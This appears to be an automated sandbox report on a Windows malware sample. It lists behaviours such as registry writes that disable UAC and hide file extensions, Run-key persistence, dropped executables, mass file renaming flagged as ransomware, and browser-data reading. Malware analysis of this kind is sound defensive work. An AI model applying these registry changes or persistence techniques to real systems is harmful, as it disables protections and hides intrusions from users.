SHA512 5a6e5afb56e9c662bbf0c878a959f42c7388fd79809b7149cb6a24bcf44a3b778851d0d416c5991ae0c593194afde97ef275cd1564ac6c908c898e16f9ea0522

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-20 02:40

Reported

2024-10-20 02:42

Platform

win10v2004-20241007-en

Max time kernel

120s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe"

Signatures

Modifies visibility of file extensions in Explorer

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Renames multiple (52) files with added filename extension

ransomware

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\ProgramData\WCwgcgww\QuYEoUUs.exe N/A
N/A N/A C:\ProgramData\uQMsEIoc\AMAkoQUc.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YUgQMkcI.exe = "C:\\Users\\Admin\\bgMQIwoo\\YUgQMkcI.exe" C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\QuYEoUUs.exe = "C:\\ProgramData\\WCwgcgww\\QuYEoUUs.exe" C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YUgQMkcI.exe = "C:\\Users\\Admin\\bgMQIwoo\\YUgQMkcI.exe" C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\QuYEoUUs.exe = "C:\\ProgramData\\WCwgcgww\\QuYEoUUs.exe" C:\ProgramData\WCwgcgww\QuYEoUUs.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\QuYEoUUs.exe = "C:\\ProgramData\\WCwgcgww\\QuYEoUUs.exe" C:\ProgramData\uQMsEIoc\AMAkoQUc.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bAIksggA.exe = "C:\\Users\\Admin\\IWkYMYcQ\\bAIksggA.exe" C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\eWMwoIIE.exe = "C:\\ProgramData\\resAEcUc\\eWMwoIIE.exe" C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\bgMQIwoo\YUgQMkcI C:\ProgramData\uQMsEIoc\AMAkoQUc.exe N/A
File opened for modification C:\Windows\SysWOW64\sheInitializeLock.docx C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
File opened for modification C:\Windows\SysWOW64\sheJoinOptimize.docx C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
File opened for modification C:\Windows\SysWOW64\shePingUnblock.png C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
File opened for modification C:\Windows\SysWOW64\sheReceiveConvertTo.xlsx C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\bgMQIwoo C:\ProgramData\uQMsEIoc\AMAkoQUc.exe N/A
File created C:\Windows\SysWOW64\shell32.dll.exe C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
File opened for modification C:\Windows\SysWOW64\sheSendRename.wma C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
File opened for modification C:\Windows\SysWOW64\sheSwitchNew.mp3 C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
